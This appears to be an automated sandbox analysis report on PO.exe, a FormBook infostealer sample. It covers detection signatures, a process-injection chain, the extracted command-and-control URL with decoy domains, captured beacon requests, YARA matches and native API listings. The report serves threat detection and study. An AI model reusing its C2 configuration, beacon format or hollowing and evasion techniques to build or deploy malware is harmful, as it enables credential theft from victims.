Analysis Report PO.exe

Overview

General Information

Sample Name: PO.exe
Analysis ID: 385455
MD5: 4bb710142c4fa183e24dbd3ce3c7b51d
SHA1: 64a659096deda60c37861ddc0d26d3bfb11cc0c7
SHA256: 4903d25c490e1b6c899c4fb9d3d3eb16d79c802245d4c2b667ff06f42724e358
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains very large array initializations
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • PO.exe (PID: 6856 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: 4BB710142C4FA183E24DBD3CE3C7B51D)
    • AddInProcess32.exe (PID: 7140 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6984 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 4488 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.retro-e-scooter.com/sawc/"], "decoy": ["prozedere.com", "p53mutation.net", "sidepiecebags.com", "5865145.com", "hushadianji.com", "riseses.com", "curvywahinemaui.com", "marienish.com", "tenxtimes.net", "xcusehheseje.com", "tjtradelimited.com", "mitraberdaya.com", "koedk.com", "currenibtc.com", "casa-rural-via.com", "prcodes.xyz", "brandariz.net", "mcsc.club", "curiget.xyz", "juli.world", "healingfory.com", "xuji68.com", "homartist.net", "acmetestanvils.com", "oaisdjoqwekxc.info", "wwwflixxy.com", "clickwisconsin.com", "magiqueweaves.com", "uox5.com", "boxj66.com", "yxcqi.com", "streaknews.com", "uorda.delivery", "milkflavor.xyz", "pandaning.com", "in-homeaccountants.com", "elblogdeyolie.com", "toughupshop.com", "sdubbink.com", "sentryinteract.com", "swpszx.com", "obsconth.site", "zhdplastic.com", "italia-re.com", "unsoldmelodies.com", "pciconsultings.com", "upliftgrp.com", "paraiso.info", "xyxrprt.com", "adanahabernet.com", "gopherguidance.com", "aengenheira.com", "myvegasboatparty.com", "abzarnovin.com", "atlantadomain.com", "sobukar.com", "directingandfilming.com", "cross23172.com", "harp-lily.com", "kentuckymeosnet.com", "wholesaletreenursery.com", "postmaster1.digital", "howtolistentomusiconline.com", "cqvckj.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      11.2.AddInProcess32.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      11.2.AddInProcess32.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      11.2.AddInProcess32.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      11.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      11.2.AddInProcess32.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: PO.exe, Virustotal: Detection: 39%
          Source: PO.exe, ReversingLabs: Detection: 27%
          Yara detected FormBook
          Source: Yara match, File source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: PO.exe, Joe Sandbox ML: detected
          Source: 11.2.AddInProcess32.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: PO.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: PO.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: PO.exe, 00000000.00000003.736056198.00000000067E6000.00000004.00000001.sdmp, AddInProcess32.exe, wlanext.exe, 00000011.00000002.909296920.00000000003BD000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.770264469.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000B.00000002.793729525.0000000001C2F000.00000040.00000001.sdmp, wlanext.exe, 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: AddInProcess32.exe, 0000000B.00000002.793498300.0000000001900000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: PO.exe, 00000000.00000003.736056198.00000000067E6000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000B.00000002.792851636.0000000000FF2000.00000002.00020000.sdmp, wlanext.exe, 00000011.00000002.909296920.00000000003BD000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wlanext.pdbGCTL source: AddInProcess32.exe, 0000000B.00000002.793498300.0000000001900000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.770264469.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h (0_2_05ACC968)
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then jmp 05AC8410h (0_2_05AC7B98)
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h (0_2_05ACDA68)
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then push dword ptr [ebp-24h] (0_2_05ACD488)
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh (0_2_05ACD488)
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then push dword ptr [ebp-24h] (0_2_05ACD47D)
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh (0_2_05ACD47D)
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then push dword ptr [ebp-20h] (0_2_05ACD168)
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh (0_2_05ACD168)
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then push dword ptr [ebp-20h] (0_2_05ACD15D)
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh (0_2_05ACD15D)
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then xor edx, edx (0_2_05ACD3B5)
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then xor edx, edx (0_2_05ACD3C0)
          Source: C:\Users\user\Desktop\PO.exe, Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h (0_2_05ACCC85)
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 4x nop then pop esi (11_2_00415836)
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 4x nop then pop esi (17_2_02845836)

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.retro-e-scooter.com/sawc/
          Source: global traffic, HTTP traffic detected: GET /sawc/?lf=CZ6X&nN60m=Yt32z530e2tITcOEW5SVHb5yrIELojDg7+FgI5/ZTK76GuoPLgYuVmd8rLeapbOqeXRQ HTTP/1.1, Host: www.marienish.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /sawc/?nN60m=oHoe0+b7kBAmda/0Hio/bDRlPufoMqcyuQMuAHeH1TSMS98bQSjEeWPHvQ043L9SYNbL&lf=CZ6X HTTP/1.1, Host: www.wwwflixxy.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /sawc/?lf=CZ6X&nN60m=LtE+xZw49qZxNGHwe/5duJoxTMG7p0RZVZ9/xidjWtVQjRXR0IRVZ3163NMz7MOSj/bw HTTP/1.1, Host: www.adanahabernet.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /sawc/?lf=CZ6X&nN60m=tBYTJLloxChiPW5nd8ZkTRTjZAEjhK8ruaBpTwz2qB9ROPU5gMN3GO43/2+iRXsYUADi HTTP/1.1, Host: www.sidepiecebags.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /sawc/?nN60m=ZLBYf+dvKraj5xhFECL+Ta+rlTPSnPltnvpHOwD/x7pMqcIuVlTqLuPQwCL73z9ijdq8&lf=CZ6X HTTP/1.1, Host: www.mitraberdaya.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: Joe Sandbox View, IP Address: 81.17.18.197
          Source: Joe Sandbox View, ASN Name: EGIHOSTINGUS
          Source: Joe Sandbox View, ASN Name: ASRSINETRU
          Source: Joe Sandbox View, ASN Name: HETZNER-ASDE
          Source: C:\Windows\explorer.exe, Code function: 15_2_04DCC302 getaddrinfo,setsockopt,recv
          Source: unknown, DNS traffic detected: queries for: www.marienish.com
          Source: C:\Windows\explorer.exe, Code function: 15_2_04DC5EB2 OpenClipboard

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          .NET source code contains very large array initializations
          Source: PO.exe, Bq61/f1Y5.cs, Large array initialization: .cctor: array initializer size 4776
          Source: 0.0.PO.exe.590000.0.unpack, Bq61/f1Y5.cs, Large array initialization: .cctor: array initializer size 4776
          Source: 0.2.PO.exe.590000.0.unpack, Bq61/f1Y5.cs, Large array initialization: .cctor: array initializer size 4776
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_004181D0 NtCreateFile,11_2_004181D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_00418280 NtReadFile,11_2_00418280
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_00418300 NtClose,11_2_00418300
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_004183B0 NtAllocateVirtualMemory,11_2_004183B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_004181CA NtCreateFile,11_2_004181CA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_0041827A NtReadFile,11_2_0041827A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_004182CA NtClose,11_2_004182CA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_004183AA NtAllocateVirtualMemory,11_2_004183AA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B799A0 NtCreateSection,LdrInitializeThunk,11_2_01B799A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_01B79910
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B798F0 NtReadVirtualMemory,LdrInitializeThunk,11_2_01B798F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79860 NtQuerySystemInformation,LdrInitializeThunk,11_2_01B79860
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79840 NtDelayExecution,LdrInitializeThunk,11_2_01B79840
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79A20 NtResumeThread,LdrInitializeThunk,11_2_01B79A20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79A00 NtProtectVirtualMemory,LdrInitializeThunk,11_2_01B79A00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79A50 NtCreateFile,LdrInitializeThunk,11_2_01B79A50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B795D0 NtClose,LdrInitializeThunk,11_2_01B795D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79540 NtReadFile,LdrInitializeThunk,11_2_01B79540
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B797A0 NtUnmapViewOfSection,LdrInitializeThunk,11_2_01B797A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79780 NtMapViewOfSection,LdrInitializeThunk,11_2_01B79780
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79FE0 NtCreateMutant,LdrInitializeThunk,11_2_01B79FE0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79710 NtQueryInformationToken,LdrInitializeThunk,11_2_01B79710
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B796E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_01B796E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_01B79660
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B799D0 NtCreateProcessEx,11_2_01B799D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79950 NtQueueApcThread,11_2_01B79950
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B798A0 NtWriteVirtualMemory,11_2_01B798A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79820 NtEnumerateKey,11_2_01B79820
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B7B040 NtSuspendThread,11_2_01B7B040
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B7A3B0 NtGetContextThread,11_2_01B7A3B0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79B00 NtSetValueKey,11_2_01B79B00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79A80 NtOpenDirectoryObject,11_2_01B79A80
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79A10 NtQuerySection,11_2_01B79A10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B795F0 NtQueryInformationFile,11_2_01B795F0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B7AD30 NtSetContextThread,11_2_01B7AD30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79520 NtWaitForSingleObject,11_2_01B79520
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79560 NtWriteFile,11_2_01B79560
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79730 NtQueryVirtualMemory,11_2_01B79730
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B7A710 NtOpenProcessToken,11_2_01B7A710
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B7A770 NtOpenThread,11_2_01B7A770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79770 NtSetInformationFile,11_2_01B79770
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79760 NtOpenProcess,11_2_01B79760
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B796D0 NtCreateKey,11_2_01B796D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79610 NtEnumerateValueKey,11_2_01B79610
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79670 NtQueryInformationProcess,11_2_01B79670
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe, Code function: 11_2_01B79650 NtQueryValueKey,11_2_01B79650
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99A50 NtCreateFile,LdrInitializeThunk,17_2_02D99A50
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99840 NtDelayExecution,LdrInitializeThunk,17_2_02D99840
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99860 NtQuerySystemInformation,LdrInitializeThunk,17_2_02D99860
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D999A0 NtCreateSection,LdrInitializeThunk,17_2_02D999A0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_02D99910
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D996D0 NtCreateKey,LdrInitializeThunk,17_2_02D996D0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D996E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_02D996E0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99650 NtQueryValueKey,LdrInitializeThunk,17_2_02D99650
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_02D99660
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99FE0 NtCreateMutant,LdrInitializeThunk,17_2_02D99FE0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99780 NtMapViewOfSection,LdrInitializeThunk,17_2_02D99780
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99710 NtQueryInformationToken,LdrInitializeThunk,17_2_02D99710
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D995D0 NtClose,LdrInitializeThunk,17_2_02D995D0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99540 NtReadFile,LdrInitializeThunk,17_2_02D99540
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99A80 NtOpenDirectoryObject,17_2_02D99A80
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99A10 NtQuerySection,17_2_02D99A10
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99A00 NtProtectVirtualMemory,17_2_02D99A00
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99A20 NtResumeThread,17_2_02D99A20
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D9A3B0 NtGetContextThread,17_2_02D9A3B0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99B00 NtSetValueKey,17_2_02D99B00
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D998F0 NtReadVirtualMemory,17_2_02D998F0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D998A0 NtWriteVirtualMemory,17_2_02D998A0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D9B040 NtSuspendThread,17_2_02D9B040
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99820 NtEnumerateKey,17_2_02D99820
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D999D0 NtCreateProcessEx,17_2_02D999D0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99950 NtQueueApcThread,17_2_02D99950
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99670 NtQueryInformationProcess,17_2_02D99670
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99610 NtEnumerateValueKey,17_2_02D99610
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D997A0 NtUnmapViewOfSection,17_2_02D997A0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D9A770 NtOpenThread,17_2_02D9A770
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99770 NtSetInformationFile,17_2_02D99770
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99760 NtOpenProcess,17_2_02D99760
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D9A710 NtOpenProcessToken,17_2_02D9A710
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99730 NtQueryVirtualMemory,17_2_02D99730
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D995F0 NtQueryInformationFile,17_2_02D995F0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99560 NtWriteFile,17_2_02D99560
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D9AD30 NtSetContextThread,17_2_02D9AD30
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02D99520 NtWaitForSingleObject,17_2_02D99520
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02848280 NtReadFile,17_2_02848280
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_028483B0 NtAllocateVirtualMemory,17_2_028483B0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_02848300 NtClose,17_2_02848300
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_028481D0 NtCreateFile,17_2_028481D0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_028482CA NtClose,17_2_028482CA
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_0284827A NtReadFile,17_2_0284827A
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_028483AA NtAllocateVirtualMemory,17_2_028483AA
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 17_2_028481CA NtCreateFile,17_2_028481CA
          Source: C:\Users\user\Desktop\PO.exe, Code function: 0_2_0280FBF8 CreateProcessAsUserW,0_2_0280FBF8
          Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: String function: 02D5B150 appears 72 times
